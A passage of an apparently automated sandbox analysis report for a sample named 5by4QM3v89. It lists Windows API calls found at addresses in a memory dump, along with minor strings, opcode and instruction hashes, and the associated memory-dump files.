                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: ab10e3d61a8a36b856a2a524679a4a64a4360140e75dbf658a456518507e8681
                                                          • Instruction ID: cc6a35c9bfb2034858b7df7f9471ee67978f093802f8f324de6dce2b8cbec4f9
                                                          • Opcode Fuzzy Hash: ab10e3d61a8a36b856a2a524679a4a64a4360140e75dbf658a456518507e8681
                                                          • Instruction Fuzzy Hash: 96113A79D00219BFDB11DB95C884E9DBB78EB48310F2041A5E904B7290DA716E11DB94
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 003912D8
                                                          • GetClientRect.USER32(?,?), ref: 003CB5FB
                                                          • GetCursorPos.USER32(?), ref: 003CB605
                                                          • ScreenToClient.USER32(?,?), ref: 003CB610
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: d4539972f6d8206af5a7c780c9a9e7078a15859389f0dd9be68ff3833abf59e8
                                                          • Instruction ID: de2fd6691f60926f283a7a50fe0cf3b10ba4da39169def524e9e18d40c22b9e9
                                                          • Opcode Fuzzy Hash: d4539972f6d8206af5a7c780c9a9e7078a15859389f0dd9be68ff3833abf59e8
                                                          • Instruction Fuzzy Hash: 65113A3550041AFFCF11EF98D9859FE77B9EB09301F4048A6F941E7141C730BA568BA9
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003ED84D
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003ED864
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003ED879
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003ED897
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 2c1e7182f88827cabb841501ef745de2456cb96a259888f57a8a8c86f0c7b763
                                                          • Instruction ID: 0a60813027b4cb16f0ab4fd9cee5fecd66eeff04dbacabb5e626a4d0589e3dfb
                                                          • Opcode Fuzzy Hash: 2c1e7182f88827cabb841501ef745de2456cb96a259888f57a8a8c86f0c7b763
                                                          • Instruction Fuzzy Hash: 051161B5605364EBE321CF52DC08F93BBFCEB00B00F108669A916D6490D7B1E9499FA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 5b1512fb33dc1c180268b5d5f7bc4e35e4290d5c92f3dc07c3e28ebc7e2b6689
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: 76014B7244815ABBCF175E85CC02DEE3F66BB18390F598419FE1898031D636D9B1AF81
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 0041B2E4
                                                          • ScreenToClient.USER32(?,?), ref: 0041B2FC
                                                          • ScreenToClient.USER32(?,?), ref: 0041B320
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B33B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 781f16ae2dc0f0186e9ae0d6430b519522a0deebd8a564e645b4c31a908a2584
                                                          • Instruction ID: 495109fc626e887a22da8fbc93e91ab53ec07c6d861b5f7b7f2855b226d21640
                                                          • Opcode Fuzzy Hash: 781f16ae2dc0f0186e9ae0d6430b519522a0deebd8a564e645b4c31a908a2584
                                                          • Instruction Fuzzy Hash: 1A114679D00609EFDB41CF99C444AEEBBB5FB18310F108166E914E3620D735AA658F94
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003F6BE6
                                                            • Part of subcall function 003F76C4: _memset.LIBCMT ref: 003F76F9
                                                          • _memmove.LIBCMT ref: 003F6C09
                                                          • _memset.LIBCMT ref: 003F6C16
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003F6C26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: 5fa10e559cd49195b915f5ed66b8fdfec289b8fdce4f690eb39da19cafd797cd
                                                          • Instruction ID: 8d1641cfc2fe939aa50f1eb869bf486401067bb9a394b8a363d98b0c64a04b29
                                                          • Opcode Fuzzy Hash: 5fa10e559cd49195b915f5ed66b8fdfec289b8fdce4f690eb39da19cafd797cd
                                                          • Instruction Fuzzy Hash: 5BF05E7A200104ABCF066F55DC85A8ABB2AEF45325F04C0A5FE089E227C732E815CBB4
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00392231
                                                          • SetTextColor.GDI32(?,000000FF), ref: 0039223B
                                                          • SetBkMode.GDI32(?,00000001), ref: 00392250
                                                          • GetStockObject.GDI32(00000005), ref: 00392258
                                                          • GetWindowDC.USER32(?,00000000), ref: 003CBE83
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 003CBE90
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 003CBEA9
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 003CBEC2
                                                          • GetPixel.GDI32(00000000,?,?), ref: 003CBEE2
                                                          • ReleaseDC.USER32(?,00000000), ref: 003CBEED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 4b51e2f280ba93356513d24a697cd182990c498a0ee0af3859f5ed035fc6862d
                                                          • Instruction ID: 33d68ad786875e778b7ec3cc53f4303c415006f62e5028aac75374b67b7a2fe8
                                                          • Opcode Fuzzy Hash: 4b51e2f280ba93356513d24a697cd182990c498a0ee0af3859f5ed035fc6862d
                                                          • Instruction Fuzzy Hash: 14E01532144244BADB225BA4BC09BD87B11AB05332F10837AFAA9880E1C77149899B12
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 003E871B
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,003E82E6), ref: 003E8722
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003E82E6), ref: 003E872F
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,003E82E6), ref: 003E8736
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 21a6799a936959a635502dbd3c296ca63b56bd4c2beafa7ea884a75190cd65ca
                                                          • Instruction ID: 93c7b01a76634e8ae2973d7c67bf4f614327f39ef8a79722a1ce2d43ed848f5d
                                                          • Opcode Fuzzy Hash: 21a6799a936959a635502dbd3c296ca63b56bd4c2beafa7ea884a75190cd65ca
                                                          • Instruction Fuzzy Hash: F5E08636A112219FD7205FB15D0CBDA3BACEF54791F15C838B689C9090DA34844AC754
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %B
                                                          • API String ID: 0-2484102343
                                                          • Opcode ID: 334c25c316c93dbafaa6916edc550c3fd4cdf74299b309c38e1d102055547458
                                                          • Instruction ID: 0fd8e40248bb4e711c2974df03ff3f26d2e4ffbfc443e00503f9c0dc689f404f
                                                          • Opcode Fuzzy Hash: 334c25c316c93dbafaa6916edc550c3fd4cdf74299b309c38e1d102055547458
                                                          • Instruction Fuzzy Hash: 93B1C27580110ADBCF17EF94C896AFEB7B9FF44310F11412AE946AB291DB349E81CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __itow_s
                                                          • String ID: xbE$xbE
                                                          • API String ID: 3653519197-3003876833
                                                          • Opcode ID: 458a79f0efa436a0252d356f3016b2abb0e25c352dac4c30c955b8766257e789
                                                          • Instruction ID: 40804abc4af569d4dc42eff709b76c542c1419545039ab0975f1f681375d73c5
                                                          • Opcode Fuzzy Hash: 458a79f0efa436a0252d356f3016b2abb0e25c352dac4c30c955b8766257e789
                                                          • Instruction Fuzzy Hash: F4B17F70A00209EBCF15DF58C891EBABBB9FF59340F14806AF945AF291DB34D941CB98
                                                          APIs
                                                            • Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • __wcsnicmp.LIBCMT ref: 003FB02D
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003FB0F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: 57a1563a86731e9571bf6ec0c9b1ffeb2ff5522a44463bf525b3028eb849822a
                                                          • Instruction ID: 498e26d57bd33c7fea3e25758934f6301c54e5551c00cb3c7a3dd8dcb81d2732
                                                          • Opcode Fuzzy Hash: 57a1563a86731e9571bf6ec0c9b1ffeb2ff5522a44463bf525b3028eb849822a
                                                          • Instruction Fuzzy Hash: 7D6186B5A00219EFCB15DF98C851EBEF7B9EF09310F11416AF916AB251DB70AE44CB50
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 003A2968
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 003A2981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: a16255be9a35c0ca18f3721605c7b336e4e36ecfec46c09d397caa7cb91cb0cf
                                                          • Instruction ID: 997c250cb743281be0d31055723c689ee73b7d7681f972250e6302779ae66f66
                                                          • Opcode Fuzzy Hash: a16255be9a35c0ca18f3721605c7b336e4e36ecfec46c09d397caa7cb91cb0cf
                                                          • Instruction Fuzzy Hash: CA5158714187449BD721EF14D886BAFBBE8FFC5340F41885DF2D8850A1EB319929CB66
                                                          APIs
                                                            • Part of subcall function 00394F0B: __fread_nolock.LIBCMT ref: 00394F29
                                                          • _wcscmp.LIBCMT ref: 003F9824
                                                          • _wcscmp.LIBCMT ref: 003F9837
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: f8683a19fbf365dccc803c3f3410caa28d7ad98bf03bde1a7fe362c4b4630cdd
                                                          • Instruction ID: 9f50679d4c2a4b117ad489b0ef6a63e667717be3155ac97cc31c8eb955b75222
                                                          • Opcode Fuzzy Hash: f8683a19fbf365dccc803c3f3410caa28d7ad98bf03bde1a7fe362c4b4630cdd
                                                          • Instruction Fuzzy Hash: 5E41E931A0021EBADF229AA5CC45FEFB7BDDF85710F01007AFA05EB180DA719905CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID: DdE$DdE
                                                          • API String ID: 1473721057-1908019880
                                                          • Opcode ID: d74fe7c18b5536bd1b81330403518e8068d27a7b4cb70692084b0e52168835d6
                                                          • Instruction ID: bd3102877fc0099e08b9d0f2aa20f6a4a777775f728219bd7cc8654a91847a0f
                                                          • Opcode Fuzzy Hash: d74fe7c18b5536bd1b81330403518e8068d27a7b4cb70692084b0e52168835d6
                                                          • Instruction Fuzzy Hash: 8D5100786087028FDB55CF18C480A2ABBF1BB99744F55895DF8858B321E331EC81CF86
                                                          APIs
                                                          • _memset.LIBCMT ref: 0040259E
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004025D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 86e740b70c21fbe8585a60cbea83f61ce4c9f1e713117bc03643f8bd68f51151
                                                          • Instruction ID: 82775d542377b66be230f19d989a1bef1b8b9169c9d662f06bbf35a25c74892d
                                                          • Opcode Fuzzy Hash: 86e740b70c21fbe8585a60cbea83f61ce4c9f1e713117bc03643f8bd68f51151
                                                          • Instruction Fuzzy Hash: 79310A71810119ABCF02EFA0CC89EEEBFB9FF08310F10016AF955BA1A1EB355956DB50
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00417B61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00417B76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 321c7ab52f917f5a356c6e22a491e85d73d5e166b28cccda5f919ad1191dbe23
                                                          • Instruction ID: d0ef7c3459e39d27b58508383d23def2457095d0d826bf58c776ae9482f808d4
                                                          • Opcode Fuzzy Hash: 321c7ab52f917f5a356c6e22a491e85d73d5e166b28cccda5f919ad1191dbe23
                                                          • Instruction Fuzzy Hash: 08413974A083099FDB14CF64C980BEABBB5FF08344F10416AE905EB341D774AA91CF94
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00416B17
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00416B53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: c35f5171784f7162fbde5cc6cccc5077811cc70670d57b02118bbe252a8ad460
                                                          • Instruction ID: d212e057cd54c5839fca19bf1eb7a8f2f905dcbea49b1f8a133095aaf6833c01
                                                          • Opcode Fuzzy Hash: c35f5171784f7162fbde5cc6cccc5077811cc70670d57b02118bbe252a8ad460
                                                          • Instruction Fuzzy Hash: FD318E71100604AADB119F68CC40BFB77A9FF48764F11852EF9A9D7190DB35EC82CB64
                                                          APIs
                                                          • _memset.LIBCMT ref: 003F2911
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003F294C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 8547ccafdbc6a5e4070c3d0dfe1d33ed0a4cc71906b756b5e93f970f04ffe247
                                                          • Instruction ID: 87910726e4cef43da4e379378d1a9cc44b5229b911f1b6cc3dfb7175da4c6842
                                                          • Opcode Fuzzy Hash: 8547ccafdbc6a5e4070c3d0dfe1d33ed0a4cc71906b756b5e93f970f04ffe247
                                                          • Instruction Fuzzy Hash: DD31B13160030DDBEB26CF98C945BFFBBB8EF45350F150029EA85A71A1D7B09954CB51
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00416761
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041676C
                                                          Strings
